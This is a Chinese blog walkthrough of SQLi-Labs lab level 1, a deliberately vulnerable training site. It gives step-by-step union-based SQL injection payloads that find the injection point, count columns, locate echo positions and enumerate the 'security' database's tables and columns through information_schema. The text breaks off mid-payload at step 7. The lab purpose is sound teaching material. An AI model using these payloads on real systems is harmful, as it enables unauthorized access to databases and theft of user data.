sql 1~5关

第一关:

1.访问SQLI-Labs网站,进入靶场

右键打开检查,进入到Hackbar(火狐插件)输入http://ip/sqli-labs/less-1/?id=1

点击Execute观察页面变化

此时页面显示id=1的用户名Dump、密码Dump。

2.寻找注入点

分别使用以下3条payload寻找注入点及判断注入点的类型:

http://ip/sqli-labs/less-1/?id=1' //报错

  http://ip/sqli-labs/less-1/?id=1' and '1'='1 //运行正常

 http://ip/sqli-labs/less-1/?id=1' and '1'='2//未正常显示

 

 由上述结果可以判断,网站存在字符型注入点。

3.判断网站查询的字段数

 http://ip/sqli-labs/less-1/?id=1' order by 1--+ //正常显示

   http://ip/sqli-labs/less-1/?id=1' order by 2--+ //正常显示

 http://ip/sqli-labs/less-1/?id=1' order by 3--+ //正常显示

  http://ip/sqli-labs/less-1/?id=1' order by 4--+  //报错

 

由此可知,网站查询的字段数为3。

4.判断网站的回显位置

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,3--+ //执行结果:2号位和3号位可以回显。

5.获取网站当前所在数据库的库名

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,database()--+ //显示结果为security。

 

 6.获取数据库security的全部表名

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name)

 from information_schema.tables where table_schema='security'--+

显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name)

 from information_schema.columns where table_schema='security' and tabl

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值